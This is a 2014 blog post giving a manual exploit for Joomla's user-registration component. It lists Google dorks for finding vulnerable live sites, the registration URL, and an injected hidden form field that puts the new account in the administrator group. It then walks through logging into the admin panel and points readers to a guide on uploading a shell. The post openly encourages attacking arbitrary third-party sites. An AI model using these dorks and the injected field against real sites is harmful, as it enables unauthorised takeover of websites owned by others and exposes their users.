Friday, 7 March 2014

Exploit Joomla! : Com_user [Manual]



  Hello everyone! It has been a while that i haven't update this blog post since i was very busy. So, as for today i wanna post about exploit in CMS Joomla! which the vulnerability is we can register new user on the site.

Finding Vulnerable target:

Dorks:

inurl:index.php/using/joomla site:com
   
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

MORE DORKS

Exploit:

index.php?option=com_users&view=registration


1- Copy any of the dorks and paste it on Google
2- Choose any site and check administrator page by adding /administrator/ at the end of the site URL.

Example:

 www.site.com/index.php/using-joomla/extensions/components/content-component/article-category-list/50-terapia

to

www.site.com/administrator/

So you will see the admin login area. If the admin login area is like the picture below, it might be vulnerable,

  
Vulnerable

 Not Vulnerable

*Note: Ignore the language of the admin login panel.
Exploiting Target

1- Paste the exploit behind the site URL, so you will get the registration form.

2- Fill in the form, at the password column, put different password.For Example,

Password: abcdefg
Confirm Password: abcxyz123

3- In the Confirm Email Column, click inspect element and paste this code below it,

<dd><input value="7" name="jform[groups][]"/></dd>

4- Click register, and it will says "Password not match.." or something similar, simply fill the form correctly and click register.

5- The confirmation email will be send to your email address, check your inbox and click on the link given to activate your account

6- Go to administrator login area, and login with your username and password.


Can't understand? Watch this video, and leave a comment :D



Also see: How to Upload Shell In Joomla! Site [Video]